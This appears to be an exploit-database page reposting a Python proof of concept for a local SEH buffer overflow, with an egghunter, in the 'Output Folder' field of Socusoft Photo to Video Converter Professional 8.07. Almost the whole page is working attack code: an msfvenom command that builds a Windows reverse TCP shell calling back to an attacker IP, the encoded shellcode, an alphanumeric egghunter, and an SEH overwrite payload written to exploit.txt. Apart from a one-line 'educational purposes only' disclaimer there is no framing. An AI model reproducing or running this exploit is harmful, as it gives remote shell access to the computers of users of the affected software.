Socusoft photo to video converter professional 8.07 output folder buffer overflow (seh egghunter) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-07-26 | Type : local | Platform : windows
This exploit / vulnerability Socusoft photo to video converter professional 8.07 output folder buffer overflow (seh egghunter) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-23
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe
# Version: 8.07
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output
# 4. Paste the clipboard into the 'Output Folder' field and click on Open

#!/usr/bin/python

# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI

buf = ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53"
buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b"
buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42"
buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77"
buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45"
buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f"
buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52"
buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c"
buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76"
buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31"
buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30"
buf += "\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61"
buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78"
buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d"
buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56"
buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76"
buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33"
buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70"
buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70"
buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f"
buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63"
buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48"
buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50"
buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58"
buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42"
buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70"
buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37"
buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f"
buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34"
buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68"
buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61"
buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35"
buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72"
buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c"
buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a"
buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39"
buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43"
buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76"
buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e"
buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64"
buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31"
buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78"
buf += "\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c"
buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70"
buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58"
buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48"
buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57"
buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70"
buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72"
buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41"



egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"

exploit = "A"*304
exploit += "\x74\x06\x75\x04"
# 0x10047a1e
exploit += "\x1e\x7a\x04\x10"
exploit += egg
exploit += "B"*(2000-312-len(egg))
exploit += "T00WT00W"
exploit += buf

f = open("exploit.txt", "w")
f.write(exploit)
f.close()